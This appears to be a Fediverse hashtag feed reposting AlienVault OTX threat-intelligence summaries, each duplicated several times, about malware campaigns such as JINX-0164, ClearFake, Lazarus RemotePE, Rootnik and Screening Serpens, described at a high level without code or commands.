#trojan — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #trojan, aggregated by home.social.
-
A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure
JINX-0164, a financially motivated threat actor active since mid-2025, has been conducting sophisticated campaigns against cryptocurrency organizations. The actor employs LinkedIn-based social engineering, posing as recruiters or business partners to deliver custom macOS malware including AUDIOFIX (a Python-based infostealer and RAT) and MINIRAT (a lightweight Go backdoor). Their operations focus on compromising developer endpoints to steal cryptocurrency wallet credentials, cloud secrets, and GitHub tokens. The attackers then pivot to CI/CD infrastructure, injecting malicious code into repositories to enable lateral movement. In April 2026, they executed a supply chain attack by trojanizing the npm package @velora-dex/sdk. The group masks activity using VPN services and demonstrates advanced capabilities including credential harvesting from password managers, browser extensions, and development tools.
Pulse ID: 6a181e409d755171f4ac356c
Pulse Link: https://otx.alienvault.com/pulse/6a181e409d755171f4ac356c
Pulse Author: AlienVault
Created: 2026-05-28 10:51:44Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#BackDoor #Browser #Cloud #CredentialHarvesting #CyberSecurity #Endpoint #GitHub #InfoSec #InfoStealer #LinkedIn #Mac #MacOS #Malware #NPM #OTX #OpenThreatExchange #Password #Python #RAT #SocialEngineering #SupplyChain #Trojan #VPN #Word #bot #cryptocurrency #AlienVault
-
A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure
JINX-0164, a financially motivated threat actor active since mid-2025, has been conducting sophisticated campaigns against cryptocurrency organizations. The actor employs LinkedIn-based social engineering, posing as recruiters or business partners to deliver custom macOS malware including AUDIOFIX (a Python-based infostealer and RAT) and MINIRAT (a lightweight Go backdoor). Their operations focus on compromising developer endpoints to steal cryptocurrency wallet credentials, cloud secrets, and GitHub tokens. The attackers then pivot to CI/CD infrastructure, injecting malicious code into repositories to enable lateral movement. In April 2026, they executed a supply chain attack by trojanizing the npm package @velora-dex/sdk. The group masks activity using VPN services and demonstrates advanced capabilities including credential harvesting from password managers, browser extensions, and development tools.
Pulse ID: 6a181e409d755171f4ac356c
Pulse Link: https://otx.alienvault.com/pulse/6a181e409d755171f4ac356c
Pulse Author: AlienVault
Created: 2026-05-28 10:51:44Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#BackDoor #Browser #Cloud #CredentialHarvesting #CyberSecurity #Endpoint #GitHub #InfoSec #InfoStealer #LinkedIn #Mac #MacOS #Malware #NPM #OTX #OpenThreatExchange #Password #Python #RAT #SocialEngineering #SupplyChain #Trojan #VPN #Word #bot #cryptocurrency #AlienVault
-
A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure
JINX-0164, a financially motivated threat actor active since mid-2025, has been conducting sophisticated campaigns against cryptocurrency organizations. The actor employs LinkedIn-based social engineering, posing as recruiters or business partners to deliver custom macOS malware including AUDIOFIX (a Python-based infostealer and RAT) and MINIRAT (a lightweight Go backdoor). Their operations focus on compromising developer endpoints to steal cryptocurrency wallet credentials, cloud secrets, and GitHub tokens. The attackers then pivot to CI/CD infrastructure, injecting malicious code into repositories to enable lateral movement. In April 2026, they executed a supply chain attack by trojanizing the npm package @velora-dex/sdk. The group masks activity using VPN services and demonstrates advanced capabilities including credential harvesting from password managers, browser extensions, and development tools.
Pulse ID: 6a181e409d755171f4ac356c
Pulse Link: https://otx.alienvault.com/pulse/6a181e409d755171f4ac356c
Pulse Author: AlienVault
Created: 2026-05-28 10:51:44Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#BackDoor #Browser #Cloud #CredentialHarvesting #CyberSecurity #Endpoint #GitHub #InfoSec #InfoStealer #LinkedIn #Mac #MacOS #Malware #NPM #OTX #OpenThreatExchange #Password #Python #RAT #SocialEngineering #SupplyChain #Trojan #VPN #Word #bot #cryptocurrency #AlienVault
-
A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure
JINX-0164, a financially motivated threat actor active since mid-2025, has been conducting sophisticated campaigns against cryptocurrency organizations. The actor employs LinkedIn-based social engineering, posing as recruiters or business partners to deliver custom macOS malware including AUDIOFIX (a Python-based infostealer and RAT) and MINIRAT (a lightweight Go backdoor). Their operations focus on compromising developer endpoints to steal cryptocurrency wallet credentials, cloud secrets, and GitHub tokens. The attackers then pivot to CI/CD infrastructure, injecting malicious code into repositories to enable lateral movement. In April 2026, they executed a supply chain attack by trojanizing the npm package @velora-dex/sdk. The group masks activity using VPN services and demonstrates advanced capabilities including credential harvesting from password managers, browser extensions, and development tools.
Pulse ID: 6a181e409d755171f4ac356c
Pulse Link: https://otx.alienvault.com/pulse/6a181e409d755171f4ac356c
Pulse Author: AlienVault
Created: 2026-05-28 10:51:44Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#BackDoor #Browser #Cloud #CredentialHarvesting #CyberSecurity #Endpoint #GitHub #InfoSec #InfoStealer #LinkedIn #Mac #MacOS #Malware #NPM #OTX #OpenThreatExchange #Password #Python #RAT #SocialEngineering #SupplyChain #Trojan #VPN #Word #bot #cryptocurrency #AlienVault
-
A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure
JINX-0164, a financially motivated threat actor active since mid-2025, has been conducting sophisticated campaigns against cryptocurrency organizations. The actor employs LinkedIn-based social engineering, posing as recruiters or business partners to deliver custom macOS malware including AUDIOFIX (a Python-based infostealer and RAT) and MINIRAT (a lightweight Go backdoor). Their operations focus on compromising developer endpoints to steal cryptocurrency wallet credentials, cloud secrets, and GitHub tokens. The attackers then pivot to CI/CD infrastructure, injecting malicious code into repositories to enable lateral movement. In April 2026, they executed a supply chain attack by trojanizing the npm package @velora-dex/sdk. The group masks activity using VPN services and demonstrates advanced capabilities including credential harvesting from password managers, browser extensions, and development tools.
Pulse ID: 6a181e409d755171f4ac356c
Pulse Link: https://otx.alienvault.com/pulse/6a181e409d755171f4ac356c
Pulse Author: AlienVault
Created: 2026-05-28 10:51:44Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#BackDoor #Browser #Cloud #CredentialHarvesting #CyberSecurity #Endpoint #GitHub #InfoSec #InfoStealer #LinkedIn #Mac #MacOS #Malware #NPM #OTX #OpenThreatExchange #Password #Python #RAT #SocialEngineering #SupplyChain #Trojan #VPN #Word #bot #cryptocurrency #AlienVault
-
Smart Contracts for C&C: How ClearFake Hid in Plain Sight on BSC Testnet
Threat actors exploited the EtherHiding technique to store ClearFake payload routing instructions within smart contracts on the BNB Smart Chain testnet, creating an immutable command-and-control infrastructure that cannot be taken down. The attack began with injected JavaScript on a compromised Swiss website that queried blockchain contracts to deliver malicious payloads. Victims passing anti-analysis checks were fingerprinted by operating system and routed to platform-specific ClickFix social engineering overlays. The campaign simultaneously deployed SectopRAT, a .NET-based remote access trojan capable of browser session hijacking, and ACRStealer, a C++ infostealer targeting credentials and cryptocurrency wallets. An on-chain execution tracker confirmed each compromise in real time. Four smart contracts shared a single deployer wallet, with the oldest deployed nearly a year before analysis, indicating a long-running, actively maintained operation.
Pulse ID: 6a15ba2632bd7e246e9c1250
Pulse Link: https://otx.alienvault.com/pulse/6a15ba2632bd7e246e9c1250
Pulse Author: AlienVault
Created: 2026-05-26 15:20:06Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#BlockChain #Browser #CandC #ClearFake #CyberSecurity #EtherHiding #InfoSec #InfoStealer #Java #JavaScript #NET #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #SocialEngineering #Trojan #bot #cryptocurrency #AlienVault
-
Smart Contracts for C&C: How ClearFake Hid in Plain Sight on BSC Testnet
Threat actors exploited the EtherHiding technique to store ClearFake payload routing instructions within smart contracts on the BNB Smart Chain testnet, creating an immutable command-and-control infrastructure that cannot be taken down. The attack began with injected JavaScript on a compromised Swiss website that queried blockchain contracts to deliver malicious payloads. Victims passing anti-analysis checks were fingerprinted by operating system and routed to platform-specific ClickFix social engineering overlays. The campaign simultaneously deployed SectopRAT, a .NET-based remote access trojan capable of browser session hijacking, and ACRStealer, a C++ infostealer targeting credentials and cryptocurrency wallets. An on-chain execution tracker confirmed each compromise in real time. Four smart contracts shared a single deployer wallet, with the oldest deployed nearly a year before analysis, indicating a long-running, actively maintained operation.
Pulse ID: 6a15ba2632bd7e246e9c1250
Pulse Link: https://otx.alienvault.com/pulse/6a15ba2632bd7e246e9c1250
Pulse Author: AlienVault
Created: 2026-05-26 15:20:06Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#BlockChain #Browser #CandC #ClearFake #CyberSecurity #EtherHiding #InfoSec #InfoStealer #Java #JavaScript #NET #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #SocialEngineering #Trojan #bot #cryptocurrency #AlienVault
-
Smart Contracts for C&C: How ClearFake Hid in Plain Sight on BSC Testnet
Threat actors exploited the EtherHiding technique to store ClearFake payload routing instructions within smart contracts on the BNB Smart Chain testnet, creating an immutable command-and-control infrastructure that cannot be taken down. The attack began with injected JavaScript on a compromised Swiss website that queried blockchain contracts to deliver malicious payloads. Victims passing anti-analysis checks were fingerprinted by operating system and routed to platform-specific ClickFix social engineering overlays. The campaign simultaneously deployed SectopRAT, a .NET-based remote access trojan capable of browser session hijacking, and ACRStealer, a C++ infostealer targeting credentials and cryptocurrency wallets. An on-chain execution tracker confirmed each compromise in real time. Four smart contracts shared a single deployer wallet, with the oldest deployed nearly a year before analysis, indicating a long-running, actively maintained operation.
Pulse ID: 6a15ba2632bd7e246e9c1250
Pulse Link: https://otx.alienvault.com/pulse/6a15ba2632bd7e246e9c1250
Pulse Author: AlienVault
Created: 2026-05-26 15:20:06Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#BlockChain #Browser #CandC #ClearFake #CyberSecurity #EtherHiding #InfoSec #InfoStealer #Java #JavaScript #NET #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #SocialEngineering #Trojan #bot #cryptocurrency #AlienVault
-
Smart Contracts for C&C: How ClearFake Hid in Plain Sight on BSC Testnet
Threat actors exploited the EtherHiding technique to store ClearFake payload routing instructions within smart contracts on the BNB Smart Chain testnet, creating an immutable command-and-control infrastructure that cannot be taken down. The attack began with injected JavaScript on a compromised Swiss website that queried blockchain contracts to deliver malicious payloads. Victims passing anti-analysis checks were fingerprinted by operating system and routed to platform-specific ClickFix social engineering overlays. The campaign simultaneously deployed SectopRAT, a .NET-based remote access trojan capable of browser session hijacking, and ACRStealer, a C++ infostealer targeting credentials and cryptocurrency wallets. An on-chain execution tracker confirmed each compromise in real time. Four smart contracts shared a single deployer wallet, with the oldest deployed nearly a year before analysis, indicating a long-running, actively maintained operation.
Pulse ID: 6a15ba2632bd7e246e9c1250
Pulse Link: https://otx.alienvault.com/pulse/6a15ba2632bd7e246e9c1250
Pulse Author: AlienVault
Created: 2026-05-26 15:20:06Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#BlockChain #Browser #CandC #ClearFake #CyberSecurity #EtherHiding #InfoSec #InfoStealer #Java #JavaScript #NET #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #SocialEngineering #Trojan #bot #cryptocurrency #AlienVault
-
Smart Contracts for C&C: How ClearFake Hid in Plain Sight on BSC Testnet
Threat actors exploited the EtherHiding technique to store ClearFake payload routing instructions within smart contracts on the BNB Smart Chain testnet, creating an immutable command-and-control infrastructure that cannot be taken down. The attack began with injected JavaScript on a compromised Swiss website that queried blockchain contracts to deliver malicious payloads. Victims passing anti-analysis checks were fingerprinted by operating system and routed to platform-specific ClickFix social engineering overlays. The campaign simultaneously deployed SectopRAT, a .NET-based remote access trojan capable of browser session hijacking, and ACRStealer, a C++ infostealer targeting credentials and cryptocurrency wallets. An on-chain execution tracker confirmed each compromise in real time. Four smart contracts shared a single deployer wallet, with the oldest deployed nearly a year before analysis, indicating a long-running, actively maintained operation.
Pulse ID: 6a15ba2632bd7e246e9c1250
Pulse Link: https://otx.alienvault.com/pulse/6a15ba2632bd7e246e9c1250
Pulse Author: AlienVault
Created: 2026-05-26 15:20:06Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#BlockChain #Browser #CandC #ClearFake #CyberSecurity #EtherHiding #InfoSec #InfoStealer #Java #JavaScript #NET #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #SocialEngineering #Trojan #bot #cryptocurrency #AlienVault
-
RemotePE: The Lazarus RAT that lives in memory
A sophisticated memory-only toolset used by a North Korean Lazarus subgroup targeting financial and cryptocurrency organizations consists of three malware families forming a chain. DPAPILoader decrypts and loads RemotePELoader from disk using Windows Data Protection API. RemotePELoader beacons to command-and-control servers and retrieves RemotePE, a fully-fledged remote access trojan executed entirely in memory without filesystem artifacts. The toolset employs environmental keying via DPAPI, EDR evasion through HellsGate technique and ETW patching, actor-in-the-loop payload delivery, and shared hosting infrastructure on Namecheap. RemotePE features comprehensive RAT capabilities including file operations, process management, command execution, and a plugin system for dynamically loading additional payloads, while maintaining persistence through masquerading as legitimate Windows services.
Pulse ID: 6a1447f25db6bc082d5093cb
Pulse Link: https://otx.alienvault.com/pulse/6a1447f25db6bc082d5093cb
Pulse Author: AlienVault
Created: 2026-05-25 13:00:34Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #EDR #Edge #InfoSec #Korea #Lazarus #Malware #Namecheap #NorthKorea #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #Trojan #Windows #bot #cryptocurrency #AlienVault
-
RemotePE: The Lazarus RAT that lives in memory
A sophisticated memory-only toolset used by a North Korean Lazarus subgroup targeting financial and cryptocurrency organizations consists of three malware families forming a chain. DPAPILoader decrypts and loads RemotePELoader from disk using Windows Data Protection API. RemotePELoader beacons to command-and-control servers and retrieves RemotePE, a fully-fledged remote access trojan executed entirely in memory without filesystem artifacts. The toolset employs environmental keying via DPAPI, EDR evasion through HellsGate technique and ETW patching, actor-in-the-loop payload delivery, and shared hosting infrastructure on Namecheap. RemotePE features comprehensive RAT capabilities including file operations, process management, command execution, and a plugin system for dynamically loading additional payloads, while maintaining persistence through masquerading as legitimate Windows services.
Pulse ID: 6a1447f25db6bc082d5093cb
Pulse Link: https://otx.alienvault.com/pulse/6a1447f25db6bc082d5093cb
Pulse Author: AlienVault
Created: 2026-05-25 13:00:34Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #EDR #Edge #InfoSec #Korea #Lazarus #Malware #Namecheap #NorthKorea #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #Trojan #Windows #bot #cryptocurrency #AlienVault
-
RemotePE: The Lazarus RAT that lives in memory
A sophisticated memory-only toolset used by a North Korean Lazarus subgroup targeting financial and cryptocurrency organizations consists of three malware families forming a chain. DPAPILoader decrypts and loads RemotePELoader from disk using Windows Data Protection API. RemotePELoader beacons to command-and-control servers and retrieves RemotePE, a fully-fledged remote access trojan executed entirely in memory without filesystem artifacts. The toolset employs environmental keying via DPAPI, EDR evasion through HellsGate technique and ETW patching, actor-in-the-loop payload delivery, and shared hosting infrastructure on Namecheap. RemotePE features comprehensive RAT capabilities including file operations, process management, command execution, and a plugin system for dynamically loading additional payloads, while maintaining persistence through masquerading as legitimate Windows services.
Pulse ID: 6a1447f25db6bc082d5093cb
Pulse Link: https://otx.alienvault.com/pulse/6a1447f25db6bc082d5093cb
Pulse Author: AlienVault
Created: 2026-05-25 13:00:34Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #EDR #Edge #InfoSec #Korea #Lazarus #Malware #Namecheap #NorthKorea #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #Trojan #Windows #bot #cryptocurrency #AlienVault
-
RemotePE: The Lazarus RAT that lives in memory
A sophisticated memory-only toolset used by a North Korean Lazarus subgroup targeting financial and cryptocurrency organizations consists of three malware families forming a chain. DPAPILoader decrypts and loads RemotePELoader from disk using Windows Data Protection API. RemotePELoader beacons to command-and-control servers and retrieves RemotePE, a fully-fledged remote access trojan executed entirely in memory without filesystem artifacts. The toolset employs environmental keying via DPAPI, EDR evasion through HellsGate technique and ETW patching, actor-in-the-loop payload delivery, and shared hosting infrastructure on Namecheap. RemotePE features comprehensive RAT capabilities including file operations, process management, command execution, and a plugin system for dynamically loading additional payloads, while maintaining persistence through masquerading as legitimate Windows services.
Pulse ID: 6a1447f25db6bc082d5093cb
Pulse Link: https://otx.alienvault.com/pulse/6a1447f25db6bc082d5093cb
Pulse Author: AlienVault
Created: 2026-05-25 13:00:34Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #EDR #Edge #InfoSec #Korea #Lazarus #Malware #Namecheap #NorthKorea #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #Trojan #Windows #bot #cryptocurrency #AlienVault
-
RemotePE: The Lazarus RAT that lives in memory
A sophisticated memory-only toolset used by a North Korean Lazarus subgroup targeting financial and cryptocurrency organizations consists of three malware families forming a chain. DPAPILoader decrypts and loads RemotePELoader from disk using Windows Data Protection API. RemotePELoader beacons to command-and-control servers and retrieves RemotePE, a fully-fledged remote access trojan executed entirely in memory without filesystem artifacts. The toolset employs environmental keying via DPAPI, EDR evasion through HellsGate technique and ETW patching, actor-in-the-loop payload delivery, and shared hosting infrastructure on Namecheap. RemotePE features comprehensive RAT capabilities including file operations, process management, command execution, and a plugin system for dynamically loading additional payloads, while maintaining persistence through masquerading as legitimate Windows services.
Pulse ID: 6a1447f25db6bc082d5093cb
Pulse Link: https://otx.alienvault.com/pulse/6a1447f25db6bc082d5093cb
Pulse Author: AlienVault
Created: 2026-05-25 13:00:34Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #EDR #Edge #InfoSec #Korea #Lazarus #Malware #Namecheap #NorthKorea #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #Trojan #Windows #bot #cryptocurrency #AlienVault
-
Android Trojan Abuses Commercial Rooting Tool and Steals Private Information
Rootnik is an Android trojan that exploits vulnerabilities in Android 4.3 and earlier by weaponizing a Chinese commercial rooting tool called Root Assistant. The malicious operation spreads through repackaged legitimate applications distributed globally, affecting users primarily in the United States, Malaysia, Thailand, Lebanon and Taiwan. After installation, Rootnik gains root access using stolen exploits, installs four persistent APK files to the system partition, and performs aggressive app promotion campaigns. The trojan silently installs and uninstalls applications, downloads and executes code remotely, and harvests sensitive data including WiFi passwords, location information, device identifiers, and MAC addresses. The malware maintains command and control infrastructure through multiple domains and generates revenue through aggressive advertising that interrupts user activity regardless of the current application.
Pulse ID: 6a123f4adef80b0c4d8ccd35
Pulse Link: https://otx.alienvault.com/pulse/6a123f4adef80b0c4d8ccd35
Pulse Author: AlienVault
Created: 2026-05-23 23:59:06Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#APK #Android #Chinese #CyberSecurity #InfoSec #Mac #Malware #OTX #OpenThreatExchange #Password #Passwords #RAT #Thailand #Trojan #UnitedStates #Word #bot #AlienVault
-
Android Trojan Abuses Commercial Rooting Tool and Steals Private Information
Rootnik is an Android trojan that exploits vulnerabilities in Android 4.3 and earlier by weaponizing a Chinese commercial rooting tool called Root Assistant. The malicious operation spreads through repackaged legitimate applications distributed globally, affecting users primarily in the United States, Malaysia, Thailand, Lebanon and Taiwan. After installation, Rootnik gains root access using stolen exploits, installs four persistent APK files to the system partition, and performs aggressive app promotion campaigns. The trojan silently installs and uninstalls applications, downloads and executes code remotely, and harvests sensitive data including WiFi passwords, location information, device identifiers, and MAC addresses. The malware maintains command and control infrastructure through multiple domains and generates revenue through aggressive advertising that interrupts user activity regardless of the current application.
Pulse ID: 6a123f4adef80b0c4d8ccd35
Pulse Link: https://otx.alienvault.com/pulse/6a123f4adef80b0c4d8ccd35
Pulse Author: AlienVault
Created: 2026-05-23 23:59:06Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#APK #Android #Chinese #CyberSecurity #InfoSec #Mac #Malware #OTX #OpenThreatExchange #Password #Passwords #RAT #Thailand #Trojan #UnitedStates #Word #bot #AlienVault
-
Android Trojan Abuses Commercial Rooting Tool and Steals Private Information
Rootnik is an Android trojan that exploits vulnerabilities in Android 4.3 and earlier by weaponizing a Chinese commercial rooting tool called Root Assistant. The malicious operation spreads through repackaged legitimate applications distributed globally, affecting users primarily in the United States, Malaysia, Thailand, Lebanon and Taiwan. After installation, Rootnik gains root access using stolen exploits, installs four persistent APK files to the system partition, and performs aggressive app promotion campaigns. The trojan silently installs and uninstalls applications, downloads and executes code remotely, and harvests sensitive data including WiFi passwords, location information, device identifiers, and MAC addresses. The malware maintains command and control infrastructure through multiple domains and generates revenue through aggressive advertising that interrupts user activity regardless of the current application.
Pulse ID: 6a123f4adef80b0c4d8ccd35
Pulse Link: https://otx.alienvault.com/pulse/6a123f4adef80b0c4d8ccd35
Pulse Author: AlienVault
Created: 2026-05-23 23:59:06Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#APK #Android #Chinese #CyberSecurity #InfoSec #Mac #Malware #OTX #OpenThreatExchange #Password #Passwords #RAT #Thailand #Trojan #UnitedStates #Word #bot #AlienVault
-
Android Trojan Abuses Commercial Rooting Tool and Steals Private Information
Rootnik is an Android trojan that exploits vulnerabilities in Android 4.3 and earlier by weaponizing a Chinese commercial rooting tool called Root Assistant. The malicious operation spreads through repackaged legitimate applications distributed globally, affecting users primarily in the United States, Malaysia, Thailand, Lebanon and Taiwan. After installation, Rootnik gains root access using stolen exploits, installs four persistent APK files to the system partition, and performs aggressive app promotion campaigns. The trojan silently installs and uninstalls applications, downloads and executes code remotely, and harvests sensitive data including WiFi passwords, location information, device identifiers, and MAC addresses. The malware maintains command and control infrastructure through multiple domains and generates revenue through aggressive advertising that interrupts user activity regardless of the current application.
Pulse ID: 6a123f4adef80b0c4d8ccd35
Pulse Link: https://otx.alienvault.com/pulse/6a123f4adef80b0c4d8ccd35
Pulse Author: AlienVault
Created: 2026-05-23 23:59:06Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#APK #Android #Chinese #CyberSecurity #InfoSec #Mac #Malware #OTX #OpenThreatExchange #Password #Passwords #RAT #Thailand #Trojan #UnitedStates #Word #bot #AlienVault
-
Android Trojan Abuses Commercial Rooting Tool and Steals Private Information
Rootnik is an Android trojan that exploits vulnerabilities in Android 4.3 and earlier by weaponizing a Chinese commercial rooting tool called Root Assistant. The malicious operation spreads through repackaged legitimate applications distributed globally, affecting users primarily in the United States, Malaysia, Thailand, Lebanon and Taiwan. After installation, Rootnik gains root access using stolen exploits, installs four persistent APK files to the system partition, and performs aggressive app promotion campaigns. The trojan silently installs and uninstalls applications, downloads and executes code remotely, and harvests sensitive data including WiFi passwords, location information, device identifiers, and MAC addresses. The malware maintains command and control infrastructure through multiple domains and generates revenue through aggressive advertising that interrupts user activity regardless of the current application.
Pulse ID: 6a123f4adef80b0c4d8ccd35
Pulse Link: https://otx.alienvault.com/pulse/6a123f4adef80b0c4d8ccd35
Pulse Author: AlienVault
Created: 2026-05-23 23:59:06Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#APK #Android #Chinese #CyberSecurity #InfoSec #Mac #Malware #OTX #OpenThreatExchange #Password #Passwords #RAT #Thailand #Trojan #UnitedStates #Word #bot #AlienVault
-
Tracking Iranian APT Screening Serpens’ 2026 Espionage Campaigns
Unit 42 researchers identified six new remote access Trojan variants deployed by Iran-nexus APT group Screening Serpens between February and April 2026, coinciding with a regional conflict starting February 28, 2026. The group targeted entities in the U.S., Israel, UAE, and other Middle Eastern locations, primarily focusing on technology sector professionals through highly tailored social engineering using personalized recruitment lures. Two new malware families, MiniUpdate and MiniJunk V2, were discovered featuring advanced techniques including AppDomainManager hijacking that manipulates .NET application initialization to disable security mechanisms. The campaigns demonstrated increased technical capabilities and operational resilience, with each variant using dedicated C2 infrastructure hosted on Azure. The attacks leveraged DLL sideloading, scheduled tasks for persistence, and sophisticated evasion techniques to maintain long-term access for espionage purposes.
Pulse ID: 6a109360ffcb2c8229a150c7
Pulse Link: https://otx.alienvault.com/pulse/6a109360ffcb2c8229a150c7
Pulse Author: AlienVault
Created: 2026-05-22 17:33:20Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#Azure #CyberSecurity #Espionage #InfoSec #Iran #Israel #Malware #MiddleEast #NET #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #SMS #SideLoading #SocialEngineering #Trojan #UAE #Unit42 #bot #AlienVault
-
Tracking Iranian APT Screening Serpens’ 2026 Espionage Campaigns
Unit 42 researchers identified six new remote access Trojan variants deployed by Iran-nexus APT group Screening Serpens between February and April 2026, coinciding with a regional conflict starting February 28, 2026. The group targeted entities in the U.S., Israel, UAE, and other Middle Eastern locations, primarily focusing on technology sector professionals through highly tailored social engineering using personalized recruitment lures. Two new malware families, MiniUpdate and MiniJunk V2, were discovered featuring advanced techniques including AppDomainManager hijacking that manipulates .NET application initialization to disable security mechanisms. The campaigns demonstrated increased technical capabilities and operational resilience, with each variant using dedicated C2 infrastructure hosted on Azure. The attacks leveraged DLL sideloading, scheduled tasks for persistence, and sophisticated evasion techniques to maintain long-term access for espionage purposes.
Pulse ID: 6a109360ffcb2c8229a150c7
Pulse Link: https://otx.alienvault.com/pulse/6a109360ffcb2c8229a150c7
Pulse Author: AlienVault
Created: 2026-05-22 17:33:20Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#Azure #CyberSecurity #Espionage #InfoSec #Iran #Israel #Malware #MiddleEast #NET #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #SMS #SideLoading #SocialEngineering #Trojan #UAE #Unit42 #bot #AlienVault
-
Tracking Iranian APT Screening Serpens’ 2026 Espionage Campaigns
Unit 42 researchers identified six new remote access Trojan variants deployed by Iran-nexus APT group Screening Serpens between February and April 2026, coinciding with a regional conflict starting February 28, 2026. The group targeted entities in the U.S., Israel, UAE, and other Middle Eastern locations, primarily focusing on technology sector professionals through highly tailored social engineering using personalized recruitment lures. Two new malware families, MiniUpdate and MiniJunk V2, were discovered featuring advanced techniques including AppDomainManager hijacking that manipulates .NET application initialization to disable security mechanisms. The campaigns demonstrated increased technical capabilities and operational resilience, with each variant using dedicated C2 infrastructure hosted on Azure. The attacks leveraged DLL sideloading, scheduled tasks for persistence, and sophisticated evasion techniques to maintain long-term access for espionage purposes.
Pulse ID: 6a109360ffcb2c8229a150c7
Pulse Link: https://otx.alienvault.com/pulse/6a109360ffcb2c8229a150c7
Pulse Author: AlienVault
Created: 2026-05-22 17:33:20Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#Azure #CyberSecurity #Espionage #InfoSec #Iran #Israel #Malware #MiddleEast #NET #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #SMS #SideLoading #SocialEngineering #Trojan #UAE #Unit42 #bot #AlienVault
-
Tracking Iranian APT Screening Serpens’ 2026 Espionage Campaigns
Unit 42 researchers identified six new remote access Trojan variants deployed by Iran-nexus APT group Screening Serpens between February and April 2026, coinciding with a regional conflict starting February 28, 2026. The group targeted entities in the U.S., Israel, UAE, and other Middle Eastern locations, primarily focusing on technology sector professionals through highly tailored social engineering using personalized recruitment lures. Two new malware families, MiniUpdate and MiniJunk V2, were discovered featuring advanced techniques including AppDomainManager hijacking that manipulates .NET application initialization to disable security mechanisms. The campaigns demonstrated increased technical capabilities and operational resilience, with each variant using dedicated C2 infrastructure hosted on Azure. The attacks leveraged DLL sideloading, scheduled tasks for persistence, and sophisticated evasion techniques to maintain long-term access for espionage purposes.
Pulse ID: 6a109360ffcb2c8229a150c7
Pulse Link: https://otx.alienvault.com/pulse/6a109360ffcb2c8229a150c7
Pulse Author: AlienVault
Created: 2026-05-22 17:33:20Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#Azure #CyberSecurity #Espionage #InfoSec #Iran #Israel #Malware #MiddleEast #NET #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #SMS #SideLoading #SocialEngineering #Trojan #UAE #Unit42 #bot #AlienVault
-
Tracking Iranian APT Screening Serpens’ 2026 Espionage Campaigns
Unit 42 researchers identified six new remote access Trojan variants deployed by Iran-nexus APT group Screening Serpens between February and April 2026, coinciding with a regional conflict starting February 28, 2026. The group targeted entities in the U.S., Israel, UAE, and other Middle Eastern locations, primarily focusing on technology sector professionals through highly tailored social engineering using personalized recruitment lures. Two new malware families, MiniUpdate and MiniJunk V2, were discovered featuring advanced techniques including AppDomainManager hijacking that manipulates .NET application initialization to disable security mechanisms. The campaigns demonstrated increased technical capabilities and operational resilience, with each variant using dedicated C2 infrastructure hosted on Azure. The attacks leveraged DLL sideloading, scheduled tasks for persistence, and sophisticated evasion techniques to maintain long-term access for espionage purposes.
Pulse ID: 6a109360ffcb2c8229a150c7
Pulse Link: https://otx.alienvault.com/pulse/6a109360ffcb2c8229a150c7
Pulse Author: AlienVault
Created: 2026-05-22 17:33:20Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#Azure #CyberSecurity #Espionage #InfoSec #Iran #Israel #Malware #MiddleEast #NET #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #SMS #SideLoading #SocialEngineering #Trojan #UAE #Unit42 #bot #AlienVault
-
SilverFox APT Distributes ValleyRAT Using Fake Microsoft Teams
ValleyRAT malware is distributed through fake Microsoft Teams download sites using trojanized installers and DLL sideloading techniques. The campaign uses multi-stage execution, persistence mechanisms and encrypted C2 communication to evade detection and conduct data theft activities on compromised systems.
Pulse ID: 6a10c2d0bebcbfb2b4e42090
Pulse Link: https://otx.alienvault.com/pulse/6a10c2d0bebcbfb2b4e42090
Pulse Author: cryptocti
Created: 2026-05-22 20:55:44Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #DataTheft #InfoSec #Malware #Microsoft #MicrosoftTeams #OTX #OpenThreatExchange #RAT #SMS #SideLoading #Trojan #bot #cryptocti
-
SilverFox APT Distributes ValleyRAT Using Fake Microsoft Teams
